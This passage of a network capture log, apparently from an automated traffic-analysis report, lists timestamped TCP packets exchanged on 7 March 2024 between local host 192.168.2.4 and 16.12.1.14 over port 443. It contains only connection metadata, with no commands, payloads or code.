                                        Mar 7, 2024 10:36:11.474005938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474015951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474035025 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474040985 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474050999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474070072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474096060 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474101067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474114895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474122047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474133968 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474139929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474159002 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474174023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474179983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474189997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474205971 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474220037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474282980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474309921 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474340916 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474345922 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474359989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474364042 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474380016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474396944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474410057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474421978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474459887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474469900 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474493027 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474523067 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474528074 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474539995 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474548101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474559069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474564075 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474581003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474600077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474603891 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474615097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474627018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474643946 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474644899 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474666119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474669933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474689960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474703074 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474734068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474755049 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474782944 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474787951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474801064 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474819899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474853039 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474883080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474910975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474915981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474936962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474937916 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474951029 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474955082 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.474971056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.474971056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475009918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475009918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475017071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475047112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475055933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475060940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475085020 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475100994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475105047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475116968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475128889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475145102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475147009 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475161076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475169897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475193024 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475229025 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475250959 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475287914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475294113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475306034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475317955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475332022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475333929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475356102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475358963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475383997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475394964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475419998 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475440979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475471020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475476027 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475491047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475496054 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475508928 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475517988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475531101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475532055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475574017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475583076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475603104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475632906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475637913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475651026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475657940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475680113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475689888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475697994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475712061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475738049 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475759983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475785971 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475815058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475820065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475830078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475842953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475853920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475860119 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475874901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475895882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475902081 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475924015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475929976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475938082 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475965977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.475992918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.475997925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476021051 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476026058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476027966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476042032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476064920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476073980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476094007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476099968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476115942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476126909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476139069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476144075 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476157904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476180077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476185083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476195097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476207018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476223946 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476229906 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476242065 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476244926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476260900 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476267099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476279020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476305962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476310968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476325989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476344109 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476362944 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476368904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476387978 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476397991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476402998 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476417065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476448059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476464033 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476469040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476480007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476497889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476507902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476509094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476525068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476545095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476567984 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476572990 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476591110 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476603031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476610899 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476632118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476660967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476665020 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476687908 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476689100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476701975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476711988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476720095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476726055 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476747036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476752043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476762056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476785898 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476793051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476816893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476845026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476850033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476871967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476874113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476880074 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476891041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476912975 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476921082 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476941109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476946115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476963043 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476969957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.476988077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.476990938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477010965 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477013111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477025032 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477044106 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477075100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477096081 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477124929 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477129936 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477143049 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477150917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477159023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477165937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477185965 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477207899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477214098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477231979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477250099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477251053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477266073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477287054 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477310896 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477315903 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477333069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477344990 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477346897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477359056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477390051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477399111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477405071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477442026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477451086 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477478981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477507114 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477511883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477521896 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477533102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477545023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477550030 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477566004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477586985 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477601051 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477611065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477621078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477632999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477650881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477657080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477669001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477689028 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477694988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477711916 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477729082 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477732897 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477745056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477766037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477790117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477794886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477812052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477827072 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477828979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477843046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477860928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477880955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477886915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477897882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477920055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477925062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477937937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477968931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.477979898 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.477987051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478018045 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478030920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478053093 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478081942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478086948 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478095055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478105068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478116989 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478122950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478137970 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478156090 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478162050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478174925 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478188038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478208065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478230953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478259087 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478264093 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478283882 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478286028 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478300095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478310108 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478322983 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478322983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478367090 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478384972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478406906 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478435993 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478441000 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478451014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478463888 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478477001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478482008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478497028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478516102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478522062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478533030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478557110 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478560925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478574038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478595018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478614092 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478619099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478641033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478641987 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478653908 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478657961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478673935 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478677034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478701115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478707075 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478715897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478744984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478745937 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478760958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478780031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478800058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478806019 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478816986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478832960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478853941 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478883028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478910923 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478915930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478939056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478940010 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478950977 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478956938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478969097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.478972912 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.478996992 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479002953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479015112 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479041100 CET4434972916.12.1.14192.168.2.4
